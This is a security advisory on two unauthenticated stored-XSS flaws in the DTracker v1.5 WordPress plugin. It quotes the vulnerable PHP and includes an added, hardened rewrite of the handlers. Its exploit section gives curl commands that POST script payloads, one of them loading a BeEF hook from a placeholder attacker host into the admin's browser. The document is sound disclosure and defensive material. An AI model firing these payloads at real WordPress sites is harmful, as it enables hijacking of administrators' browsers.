Advisory #: 186
Title: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID:[CVE-2017-1002006][CVE-2017-1002007]
CWE: CWE-306 Missing Authentication for Critical Function
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-09
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=186
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002006: The file dtracker/save_contact.php does not check that the requester is authorized before writing attacker-supplied values into the wp_contacts table. A single unauthenticated POST request updates the contact row whose id is passed in contact_id, and none of the submitted fields are sanitized. A malicious user can store JavaScript in the database to be executed in the browser of the admin user who views the tracked contacts.

  $name = $_POST['name'];
  $company = $_POST['company'];
  $phone = $_POST['phone'];
  $country = $_POST['country'];
  $contact_id = $_POST['contact_id'];
  $table = 'wp_contacts';
  $data = array(
      'name' => $name,
      'company' => $company,
      'phone' => $phone,
      'country' => $country,
  );
  $where = array( 'id' => $contact_id );
  $wpdb->flush();
  $wpdb->update( $table, $data, $where ); //Update the Contact

CVE-2017-1002007: The file dtracker/save_mail.php does not check that the requester is authorized before inserting new rows into the wp_contacts table. A single unauthenticated POST request adds a new contact with an arbitrary, unsanitized email value, and the inserted row (including its id) is echoed back as JSON. A malicious user can store JavaScript in the database to be executed in the browser of the admin user who views the tracked contacts.

  $email = $_POST['email'];
  $time = date('Y-m-d H:i:s');
  $ip = $_SERVER [ 'REMOTE_ADDR' ] ; //get IP address of the visitor
  $table = "wp_contacts";
  $data = array (
      'email' => $email,
      'time' => $time,
      'ip' => $ip
  );
  $wpdb->insert( $table, $data); //Insert Values
  $contact_id = $wpdb->insert_id; //Get ID of the last inserted row
  $data['contactId'] = $contact_id;
  echo json_encode($data); //Pass the id to the JS
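The following is an added example, not the DTracker plugin's code or the advisory author's: a hardened replacement for the logic of save_mail.php and save_contact.php, written as admin-ajax.php actions instead of directly callable files. The action names (dtracker_save_mail, dtracker_save_contact), the nonce action string 'dtracker_track' and the rule that a contact row may only be updated from the IP that created it are assumptions made for illustration. Because the tracking form is filled in by anonymous downloaders, a login or capability check would break the feature, so the request is instead bound to a nonce issued with the download form, every field is validated before it reaches $wpdb, and values are escaped when the admin page renders them.

```php
<?php
// Added example, not code from the DTracker plugin. Assumed names:
// dtracker_save_mail / dtracker_save_contact (AJAX actions) and the
// 'dtracker_track' nonce action minted on the page that shows the form.

add_action( 'wp_ajax_dtracker_save_mail',        'dtracker_save_mail' );
add_action( 'wp_ajax_nopriv_dtracker_save_mail', 'dtracker_save_mail' );

function dtracker_save_mail() {
    global $wpdb;

    // Dies with HTTP 403 unless the request carries an '_ajax_nonce' field
    // created by wp_create_nonce( 'dtracker_track' ) when the form was rendered.
    check_ajax_referer( 'dtracker_track' );

    $email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    if ( '' === $email || ! is_email( $email ) ) {
        // '"><script>...' never matches is_email(), so the payload is rejected here.
        wp_send_json_error( array( 'message' => 'invalid email' ), 400 );
    }

    $table = $wpdb->prefix . 'contacts';   // honours a non-default table prefix
    $data  = array(
        'email' => $email,
        'time'  => current_time( 'mysql' ),
        'ip'    => sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ),
    );
    $wpdb->insert( $table, $data, array( '%s', '%s', '%s' ) );

    $data['contactId'] = (int) $wpdb->insert_id;
    wp_send_json_success( $data );
}

add_action( 'wp_ajax_dtracker_save_contact',        'dtracker_save_contact' );
add_action( 'wp_ajax_nopriv_dtracker_save_contact', 'dtracker_save_contact' );

function dtracker_save_contact() {
    global $wpdb;
    check_ajax_referer( 'dtracker_track' );

    $contact_id = isset( $_POST['contact_id'] ) ? absint( $_POST['contact_id'] ) : 0;
    if ( 0 === $contact_id ) {
        wp_send_json_error( array( 'message' => 'invalid contact_id' ), 400 );
    }

    // Free-text fields are reduced to plain text; tags and control characters go.
    $data = array();
    foreach ( array( 'name', 'company', 'phone', 'country' ) as $field ) {
        $data[ $field ] = isset( $_POST[ $field ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $field ] ) )
            : '';
    }

    // Assumed rule: a visitor may only complete the row created from the same
    // address, so an arbitrary contact_id no longer overwrites other people's rows.
    $where = array(
        'id' => $contact_id,
        'ip' => sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ),
    );
    $updated = $wpdb->update(
        $wpdb->prefix . 'contacts',
        $data,
        $where,
        array( '%s', '%s', '%s', '%s' ),
        array( '%d', '%s' )
    );

    if ( false === $updated || 0 === $updated ) {
        wp_send_json_error( array( 'message' => 'no matching contact' ), 404 );
    }
    wp_send_json_success( array( 'contactId' => $contact_id ) );
}

// The admin listing must escape stored values on output. Even with the input
// checks above, this is the control that actually prevents stored XSS.
function dtracker_render_cell( $value ) {
    return esc_html( (string) $value );
}
```

The form page has to emit the nonce (wp_nonce_field( 'dtracker_track' ) or wp_create_nonce( 'dtracker_track' ) passed to the script) so the JavaScript can send it as _ajax_nonce. A nonce does not authenticate an anonymous visitor; it only ties the request to a page WordPress rendered and expires after a day, so the input validation and the esc_html() call on the admin side are what remove the injection, and the nonce mainly stops drive-by and scripted inserts that never loaded the form.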
Exploit Code:
  $ curl --data "email=\"><script>alert(1);</script>" http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
  {"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}

Or better yet, inject a BeEF hook:

  $ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
Screen Shots: [dtracker.png]
Notes:
I imagine you could get RCE similar to some exploits targeting the Wordpress JSON API vulnerability Marc Montpas discovered.